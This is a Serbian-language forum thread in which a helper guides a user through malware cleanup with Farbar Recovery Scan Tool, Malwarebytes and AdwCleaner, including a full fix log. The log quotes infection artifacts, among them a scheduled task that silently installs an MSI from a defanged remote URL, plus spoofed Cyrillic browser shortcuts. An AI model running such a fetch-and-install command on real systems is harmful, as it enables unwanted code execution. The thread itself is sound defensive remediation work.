CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0002E005-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35200-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35201-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35202-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35203-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-49C2F4479574}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{46763EE0-CAB2-11CE-8C20-00AA0051E5D4}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{D5DE8D20-5BB8-11D1-A1E3-00A0C90F2731}\InprocServer32 -> no filepath
Task: {9931FCAE-5037-4F66-83F7-2B0B40881B5A} - System32\Tasks\Pegasbetotion => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD3200AVJS-63B6A0_WD-WCAT1A29657496574&v=2017311 /q <==== ATTENTION
Task: {C7442C22-8DE8-4479-8FEA-9A361A58BAD6} - System32\Tasks\Milimili => C:\Program Files\MIO\MIO.exe <==== ATTENTION
C:\Program Files\MIO
Shortcut: C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехplorеr.lnk -> C:\Users\dejan\AppData\Roaming\Browsers\exe.erolpxei.bat (No File) <==== Cyrillic
Shortcut: C:\Users\dejan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Chrоmе.lnk -> C:\Users\dejan\AppData\Roaming\Browsers\exe.emorhc.bat (No File) <==== Cyrillic
FirewallRules: [{2A579B6B-B7F1-4878-B269-A5FFA4D229F6}] => (Allow) C:\Program Files\Popcorn Time\Updater.exe
FirewallRules: [{FB0D2782-31A0-45C9-BF51-38517A2BB1BB}] => (Allow) C:\Program Files\Popcorn Time\Updater.exe
C:\Users\dejan\AppData\Roaming\Browsers
C:\Program Files\Steerwardpriboly Builder


U okviru Notepad-a klikni na File --> Save As
Pod Encoding izaberi Unicode.
Fajl nazovi Fixlist i sačuvaj na Desktop
Dvoklikom ponovo pokreni FRST.exe
Klikni na Fix i sačekaj dok program ne završi.
Ukoliko program zatraži restart računara, omogući mu da to nesmetano obavi.
Nakon završetka rada, otvoriće se fixlog.txt, sa sadržajem koji treba da kopiraš u temu.
Takođe, na Desktop-u će se nalaziti (fixlog.txt).


Idi u C:\Windows\Minidump folder i kopiraj fajl pod nazivom 082317-49609-01.dmp na Desktop. Zatim ga zapakuj i zakači u temu.

offline
  • u administraciji
  • Pridružio: 16 Okt 2010
  • Poruke: 3468
  • Gde živiš: KRAGUJEVAC

Fix result of Farbar Recovery Scan Tool (x86) Version: 20-08-2017
Ran by dejan (29-08-2017 21:31:39) Run:4
Running from C:\Users\dejan\Desktop
Loaded Profiles: dejan (Available Profiles: dejan)
Boot Mode: Normal

==============================================

fixlist content:
*****************
CreateRestorePoint:
(Popcorn Time) C:\Program Files\Popcorn Time\Updater.exe
C:\Program Files\Popcorn Time
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.google.com/","hxxp://www.youndoo.com/?z=61bcc231723f316e9912186g2z5b6teo2w2zazczaq&from=amz&uid=WDCXWD3200AVJS-63B6A0_WD-WCAT1A29657496574&type=hp","hxxp://www.search.ask.com/?o=APN10640A&gct=hp&d=473-102&v=a12627-333&t=4","hxxp://www.initialsite123.com/?z=53e8deaf6335b4feab6622eg8z8t0g5mbw7q9b8w6o&from=icb&uid=HitachiXHDS721050CLA362_JPF521HA3EJ06V3EJ06VX&type=hp"
CHR Profile: C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-08-27] <==== ATTENTION
C:\Users\dejan\k350n_.reg
R2 Update service; C:\Program Files\Popcorn Time\Updater.exe [339968 2016-08-26] (Popcorn Time) [File not signed]
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\ChromeHTML: -> <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0000002F-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0002E005-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35200-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35201-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35202-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35203-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-49C2F4479574}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{46763EE0-CAB2-11CE-8C20-00AA0051E5D4}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{D5DE8D20-5BB8-11D1-A1E3-00A0C90F2731}\InprocServer32 -> no filepath
Task: {9931FCAE-5037-4F66-83F7-2B0B40881B5A} - System32\Tasks\Pegasbetotion => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD3200AVJS-63B6A0_WD-WCAT1A29657496574&v=2017311 /q <==== ATTENTION
Task: {C7442C22-8DE8-4479-8FEA-9A361A58BAD6} - System32\Tasks\Milimili => C:\Program Files\MIO\MIO.exe <==== ATTENTION
C:\Program Files\MIO
Shortcut: C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехplorеr.lnk -> C:\Users\dejan\AppData\Roaming\Browsers\exe.erolpxei.bat (No File) <==== Cyrillic
Shortcut: C:\Users\dejan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Chrоmе.lnk -> C:\Users\dejan\AppData\Roaming\Browsers\exe.emorhc.bat (No File) <==== Cyrillic
FirewallRules: [{2A579B6B-B7F1-4878-B269-A5FFA4D229F6}] => (Allow) C:\Program Files\Popcorn Time\Updater.exe
FirewallRules: [{FB0D2782-31A0-45C9-BF51-38517A2BB1BB}] => (Allow) C:\Program Files\Popcorn Time\Updater.exe
C:\Users\dejan\AppData\Roaming\Browsers
C:\Program Files\Steerwardpriboly Builder
*****************

Restore point was successfully created.
C:\Program Files\Popcorn Time\Updater.exe
[2820] C:\Program Files\Popcorn Time\Updater.exe => process closed successfully.
C:\Program Files\Popcorn Time => moved successfully
Chrome StartupUrls => removed successfully.
C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData => moved successfully
C:\Users\dejan\k350n_.reg => moved successfully
HKLM\System\CurrentControlSet\Services\Update service => key removed successfully.
Update service => service removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\ChromeHTML => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0000002F-0000-0000-C000-000000000046} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020420-0000-0000-C000-000000000046} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020421-0000-0000-C000-000000000046} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020422-0000-0000-C000-000000000046} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020423-0000-0000-C000-000000000046} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020424-0000-0000-C000-000000000046} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020425-0000-0000-C000-000000000046} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0002E005-0000-0000-C000-000000000046} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35200-8F91-11CE-9DE3-00AA004BB851} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35201-8F91-11CE-9DE3-00AA004BB851} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35202-8F91-11CE-9DE3-00AA004BB851} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35203-8F91-11CE-9DE3-00AA004BB851} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-49C2F4479574} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{46763EE0-CAB2-11CE-8C20-00AA0051E5D4} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{D5DE8D20-5BB8-11D1-A1E3-00A0C90F2731} => key removed successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9931FCAE-5037-4F66-83F7-2B0B40881B5A} => key removed successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9931FCAE-5037-4F66-83F7-2B0B40881B5A} => key removed successfully.
C:\Windows\System32\Tasks\Pegasbetotion => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Pegasbetotion => key removed successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C7442C22-8DE8-4479-8FEA-9A361A58BAD6} => key removed successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C7442C22-8DE8-4479-8FEA-9A361A58BAD6} => key removed successfully.
C:\Windows\System32\Tasks\Milimili => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => key removed successfully.
"C:\Program Files\MIO" => not found.
C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехplorеr.lnk => moved successfully
C:\Users\dejan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Chrоmе.lnk => moved successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{2A579B6B-B7F1-4878-B269-A5FFA4D229F6} => value removed successfully.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{FB0D2782-31A0-45C9-BF51-38517A2BB1BB} => value removed successfully.
"C:\Users\dejan\AppData\Roaming\Browsers" => not found.
"C:\Program Files\Steerwardpriboly Builder" => not found.

==== End of Fixlog 21:32:41 ====



https://www.mycity.rs/must-login.png

offline
  • Pridružio: 14 Jun 2016
  • Poruke: 535

Preuzmi Malwarebytes Anti-Malware sa ovog ili ovog ili ovog linka i instaliraj aplikaciju.
Pokreni mb3-setup-consumer-{verzija}.exe i isprati uputstva za instalaciju programa. Nakon instalacije, klikni na Finish

Prilikom prvog pokretanja, program će prikazati prozor "dobrodošlice". Slobodno zatvori taj prozor.
Napomena: Premium funkcije programa su već aktivirane i važe 13 dana od trenutka instalacije. Premium funkcije možeš isključiti preko Settings > My Account tab podešavanja.

• Podešavanja skenera - u Settings, klikni na Protection tab. Ispod Scan Options sekcije, uključi "Scan for rootkits" opciju.
• Pripremi podešavanja za Threat Scan - u Dashboard , klikni na Scan Now dugme. MBAM će ažurirati bazu i započeti skeniranje.

Kada se skeniranje završi, ako je infekcija detektovana, obrati pažnju da je sve označeno, pa klikni na Remove Selected. Restartuj računar ako program upita za restart.
• Dostavi log: Pod Reports izaberi trenutni datum izveštaja Scan Report i potom klikni na View Report.

Izvezi log na Desktop;
- Klikni na Export dugme na dnu, pa onda izaberi 'Text file (*.txt)'
# U Save File dijalogu koji se pojavi, klikni na Desktop. U File name: polje, upiši "mbam" (bez navodnika) i klikni na Save.
- Pojaviće se poruka "Your file has been successfully exported", klikni Ok i zatvori prozor.



• U odgovoru prikači mbam.txt log koristeći "Prikači fajl" opciju.


Zatim:

Preuzmi AdwCleaner i sačuvaj ga na Desktop
Dvoklikom pokreni program.
U EULA prozoru klikni na I agree.
U Tools odaberi Options.
U dijaloškom okviru koji se pojavi isključi Reset Winsock settings ako je uključen.
Klikni na dugme Scan i sačekaj da se završi skeniranje.
Ako ti javi da postoji novija verzija, postaraj se da je preuzmeš.

Klikni na dugme Clean i pričekaj da program završi.
Program će zatvoriti sve aktivne programe i izbaciti prozor sa tim upozorenjem. Klikni OK kao potvrdu.
Pojavit će se poruka da računar treba restartovati. Klikni OK

Računar će se restartovati, a potom otvoriti Notepad (C:\Adwcleaner\AdwCleaner[C0].txt) sa izvještajem.
Sačuvaj taj izvještaj na Desktop i okači ga uz poruku koristeći opciju "Prikači fajl"

offline
  • u administraciji
  • Pridružio: 16 Okt 2010
  • Poruke: 3468
  • Gde živiš: KRAGUJEVAC

Napisano: 31 Avg 2017 15:30

Nemam view report , računar je zatražio restartovanje odradio sam ,ali nemam ovo dalje.



Dopuna: 31 Avg 2017 16:20

Sad nakon odrađenog sa ADW cleanerom, sistem neće da se podigne, samo mi izlazi Automatic Reapair, Dignose pc, imam uključen system restore, ali ga nije odradio izbacio mi ovo

offline
  • Pridružio: 14 Jun 2016
  • Poruke: 535

Butuj u Advanced Boot Options, otvori cmd i upiši: chkdsk /r

offline
  • u administraciji
  • Pridružio: 16 Okt 2010
  • Poruke: 3468
  • Gde živiš: KRAGUJEVAC

Već sam završio. Resetovao sistem, sve važno mi je na drugim particijama. Hvala.

Ko je trenutno na forumu
 

Ukupno su 972 korisnika na forumu :: 36 registrovanih, 6 sakrivenih i 930 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3466 - dana 01 Jun 2021 17:07

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: A.R.Chafee.Jr., Asparagus, Ben Roj, bojan_t, bojank, bojcistv, Bubimir, ceman, cenejac111, Dimitrije Paunovic, dragan_mig31, dragoljub11987, Dukelander, dule10savic, Excalibur13, gomago, ivica976, kalens021, Karla, Kubovac, mackenzie, MiG-29M2, Mts_Rus, raptorsi, Romibrat, Shinobi, Sirius, skvara, Srle993, suton, tmanda323, uruk, vathra, virked, Žoržo, 125